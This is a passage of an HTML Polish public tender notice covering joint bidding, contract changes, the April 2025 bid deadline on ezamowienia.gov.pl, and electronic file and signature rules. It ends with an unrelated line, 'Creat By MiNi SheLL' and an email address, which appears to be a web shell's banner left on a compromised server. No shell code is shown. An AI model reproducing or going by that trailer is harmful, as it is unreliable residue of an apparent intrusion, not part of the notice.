umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ich oferta musi spełniać następujące wymagania:<br/>a)	w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców ubiegających się wspólnie o zamówienie, oddzielnie musi udokumentować, że nie podlega wykluczeniu z Postępowania na podstawie art. 108 ustawy Pzp ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 poz. 129) <br/>b)	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania <br/>ich w Postępowaniu lub do reprezentowania ich w Postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy przedłożyć w ofercie w formie, o którym mowa w ust.1 pkt. 4),<br/>c)	wszelka korespondencja w Postępowaniu prowadzona będzie wyłącznie z pełnomocnikiem,<br/>d)	wypełniając Formularz Ofertowy, jak również inne dokumenty powołujące się na „Wykonawcę”; w miejscu „np. nazwa i adres Wykonawcy” należy wpisać dane dotyczące każdego z Wykonawców wspólnie ubiegających się o udzielnie zamówienia, a nie dane pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego, w sposób i na warunkach określonych w projektowanych postanowieniach umowy stanowiących Załącznik nr 3 do SWZ.<br/>2.	Zamawiający przewiduje możliwość zmiany zawartości umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 i 455 Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-15 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Oferta powinna być sporządzona w języku polskim, w formacie danych .pdf, .doc, .docx, .rtf, .txt, .xls lub .xlsx (wybór formatu danych należy do Wykonawcy). <br/>2.	Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne <br/>z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>3.	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) <br/>ze szczególnym wskazaniem na .pdf<br/>4.	Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>5.	Oferta powinna być sporządzona, pod rygorem nieważności, w formie elektronicznej <br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy, zgodnie z zasadami reprezentacji Wykonawcy. <br/>6.	Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, pełnomocnictwa, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r. poz. 346. z późn. zm.).<br/>7.	Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 1 uzupełnienia, przekazywane w postępowaniu, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. <br/>o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej.<br/>8.	W przypadku gdy dokumenty potwierdzające umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy lub Podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach, zwane dalej „dokumentami potwierdzającymi umocowanie do reprezentowania”, zostały wystawione przez upoważnione podmioty inne niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub Podwykonawca, zwane dalej „upoważnionymi podmiotami”, jako dokument elektroniczny, przekazują ten dokument.<br/>9.	W przypadku gdy dokumenty potwierdzające umocowanie do reprezentowania, zostały wystawione przez upoważnione podmioty jako dokument w postaci papierowej, Wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>10.	Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, <br/>o którym mowa w ust. 4, dokonuje w przypadku: <br/>	dokumentów potwierdzających umocowanie do reprezentowania – odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub Podwykonawca, w zakresie dokumentów potwierdzających umocowanie <br/>do reprezentowania, które każdego z nich dotyczą<br/>	innych dokumentów – odpowiednio Wykonawca lub Wykonawca wspólnie ubiegający <br/>się o udzielenie zamówienia, w zakresie dokumentów, które każdego z nich dotyczą.

Creat By MiNi SheLL
Email: jattceo@gmail.com